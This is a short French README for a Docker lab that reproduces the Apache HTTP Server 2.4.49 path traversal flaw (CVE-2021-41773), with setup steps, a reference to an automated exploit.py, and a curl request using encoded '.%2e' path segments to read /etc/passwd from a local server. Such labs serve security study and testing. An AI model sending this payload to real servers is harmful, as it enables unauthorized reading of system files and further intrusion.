
Laboratoire Docker vulnérable et exploit pour la vulnérabilité de traversée de chemin d'Apache HTTP Server 2.4.49 (CVE‑2021‑41773)
git clone https://github.com/zubairahm3d/apache-cve-2021-41773-lab.git
cd apache-cve-2021-41773-lab
chmod +x apache_lab.sh
Démarrer le serveur vulnérable :
./apache_lab.sh # choose option 1
Exploitation manuelle :
curl --path-as-is http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
Exploitation automatisée :
python3 exploit.py
Arrêter le serveur :
./apache_lab.sh # choose option 2



